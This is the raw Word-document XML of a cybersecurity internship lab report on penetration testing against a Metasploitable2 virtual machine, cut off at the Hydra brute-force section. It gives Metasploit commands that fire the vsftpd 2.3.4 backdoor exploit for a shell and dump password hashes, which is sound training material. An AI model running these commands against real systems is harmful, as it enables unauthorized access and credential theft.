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AA5F8" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F2043"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>TASK 4: EXPLOITATION &amp; SYSTEM SECURITY — DETAILED EXECUTION REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7DE19A" w14:textId="448E7981" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="46505F"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>ApexPlanet Software Pvt. Ltd. — Cybersecurity Internship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2B5848" w14:paraId="41535067" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6E44B63A" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Author: </w:t>
            </w:r>
            <w:r>
              <w:t>Jetty Charan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="5D0FC707" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Role: </w:t>
            </w:r>
            <w:r>
              <w:t>Cybersecurity Analyst Intern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5848" w14:paraId="3C917676" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="344058BC" w14:textId="06B9809E" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Organization: </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ApexPlanet Software Pvt. Ltd. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2398EB8E" w14:textId="038C30A5" w:rsidR="002B5848" w:rsidRDefault="002B5848"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="337A5879" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A0D7FF" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F2043"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1. Executive Summary &amp; Assessment Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B3AC2" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>This technical report documents the complete implementation of Task 4 (Exploitation &amp; System Security) under the ApexPlanet Cybersecurity &amp; Ethical Hacking Internship Program (Days 37–48) [cite: 15]. The primary objective is to understand penetration testing workflows and exploit vulnerabilities responsibly [cite: 15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285A1EB0" w14:textId="4BC97793" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t xml:space="preserve">The curriculum comprises six core practical steps, fully expanded with dedicated screenshot holders for every phase and step </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2458034E" w14:textId="3B69F729" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E1E1E"/>
        </w:rPr>
        <w:t xml:space="preserve">• Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Penetration Testing Methodology: Structured into 5 distinct phases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F83981B" w14:textId="7B0A4EE6" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E1E1E"/>
        </w:rPr>
        <w:t xml:space="preserve">• Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation with Metasploit: Target selection, exploit execution, and post-exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566F3CAB" w14:textId="387991BE" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E1E1E"/>
        </w:rPr>
        <w:t xml:space="preserve">• Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Attacks: Automated network brute-forcing and offline hash cracking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04774571" w14:textId="23B267FE" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E1E1E"/>
        </w:rPr>
        <w:t xml:space="preserve">• Step 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t xml:space="preserve">Social Engineering: Phishing portal simulation and security awareness training </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAFA0F1" w14:textId="64BCE5B2" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E1E1E"/>
        </w:rPr>
        <w:t xml:space="preserve">• Step 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Malware Basics: Static artifact evaluation and dynamic runtime behavior tracing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BE33C9" w14:textId="22363FDA" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E1E1E"/>
        </w:rPr>
        <w:t xml:space="preserve">• Step 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t xml:space="preserve">System Hardening: Security patching, firewall rule setup, and active socket auditing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D59823" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F2043"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2. Step 1: Penetration Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A42B1" w14:textId="57D50AE7" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration testing relies on a structured 5-phase methodology to systematically evaluate target infrastructure </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1D612E" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2.1 Phase 1: Reconnaissance (Information Gathering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E261C99" w14:textId="78E2D29C" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance focuses on gathering technical intelligence through passive OSINT queries and active target probing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E76C6" w14:textId="608B795B" w:rsidR="002B5848" w:rsidRDefault="00B50DF1">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61BB8B12" wp14:editId="480D6153">
            <wp:extent cx="5943600" cy="3522345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="976249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49547" name="Picture 97624954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F698A" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2.2 Phase 2: Scanning &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A40A447" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Scanning identifies active target IP addresses, open network ports, running service banners, and software versions [cite: 15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F39CD04" w14:textId="4251550D" w:rsidR="002B5848" w:rsidRDefault="00B50DF1">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4538A1DF" wp14:editId="616BB3B2">
            <wp:extent cx="5943600" cy="3534410"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="488201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0198" name="Picture 4882019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AFE0D" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.3 Phase 3: Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54710C44" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Exploitation involves weaponizing identified vulnerabilities to gain initial unauthorized access [cite: 15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A88C761" w14:textId="14EEDD34" w:rsidR="002B5848" w:rsidRDefault="00B50DF1">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AA8D275" wp14:editId="1C12670E">
            <wp:extent cx="5943600" cy="3534410"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="12927475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747595" name="Picture 129274759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5BB43" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2.4 Phase 4: Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFDF02C" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Post-exploitation gathers system specs (`sysinfo`), audits user accounts (`hashdump`), and evaluates privilege levels [cite: 15].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2B5848" w14:paraId="62D2257E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="4BF3CB7C" w14:textId="115E82BD" w:rsidR="002B5848" w:rsidRDefault="00B50DF1">
            <w:pPr>
              <w:spacing w:before="160" w:after="16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1CA509E" wp14:editId="67AF80B5">
                  <wp:extent cx="5943600" cy="3525520"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="178026705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0267057" name="Picture 178026705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25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F53D9F" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0549D75B" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2.5 Phase 5: Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD76252" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>The final phase documents findings, risk severities, reproduction steps, and actionable remediation guidelines [cite: 15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797FC20F" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3544A067" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F2043"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3. Step 2: Exploitation with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA5913" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Step 2 covers practical exploitation in a virtual lab targeting Metasploitable2 [cite: 15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7F696" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3.1 Phase 2.1: Target Selection &amp; Module Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B934F" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Configuring target options and selecting the `vsftpd_235_backdoor` exploit module in `msfconsole` [cite: 15]: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B5848" w14:paraId="7B782AF4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24" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
          </w:tcPr>
          <w:p w14:paraId="415F2E18" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="100" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>use exploit/unix/ftp/vsftpd_235_backdoor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>set RHOSTS 192.168.56.101</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>show options</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C14C37B" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848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2B5848" w14:paraId="2AA284A0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="539C34CD" w14:textId="2CD92C70" w:rsidR="002B5848" w:rsidRDefault="00B50DF1">
            <w:pPr>
              <w:spacing w:before="160" w:after="16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28A8E6B" wp14:editId="44932B94">
                  <wp:extent cx="5943600" cy="3525520"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="448126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81260" name="Picture 448126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25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C6B409" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF582CD" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3.2 Phase 2.2: Exploit Execution &amp; Shell Spawning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A7E1E4" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Executing the exploit module to trigger the backdoor and spawn an interactive shell session [cite: 15]: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B5848" w14:paraId="63522832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24" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
          </w:tcPr>
          <w:p w14:paraId="3091C57D" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="100" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61DCF38F" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848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2B5848" w14:paraId="512A201F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="74789647" w14:textId="7D1855CA" w:rsidR="002B5848" w:rsidRDefault="00B50DF1">
            <w:pPr>
              <w:spacing w:before="160" w:after="16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9A02B88" wp14:editId="620843CD">
                  <wp:extent cx="5943600" cy="3525520"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="161846131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8461311" name="Picture 161846131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25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1F28B1" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E68E990" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3.3 Phase 2.3: Post-Exploitation Auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D51C4B" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Gathering system architecture specs and extracting password hashes from the target system [cite: 15]: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B5848" w14:paraId="47EBD828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24" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
          </w:tcPr>
          <w:p w14:paraId="5FAB410F" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="100" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>sysinfo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>run post/linux/gather/hashdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DD04C1A" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848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2B5848" w14:paraId="6DED36B2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="7B04458D" w14:textId="0BB7EE8C" w:rsidR="002B5848" w:rsidRDefault="00B50DF1" w:rsidP="00B50DF1">
            <w:pPr>
              <w:spacing w:before="160" w:after="160"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A472E27" wp14:editId="68E32BD7">
                  <wp:extent cx="5943600" cy="3525520"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="74797949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7979490" name="Picture 74797949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25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5829E6" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114C314D" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F2043"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4. Step 3: Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C1B29" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Step 3 tests credential resilience through network brute-forcing and offline dictionary attacks [cite: 15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727AB29B" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4.1 Phase 3.1: Automated SSH Brute-Forcing (Hydra)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6822E5C8" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
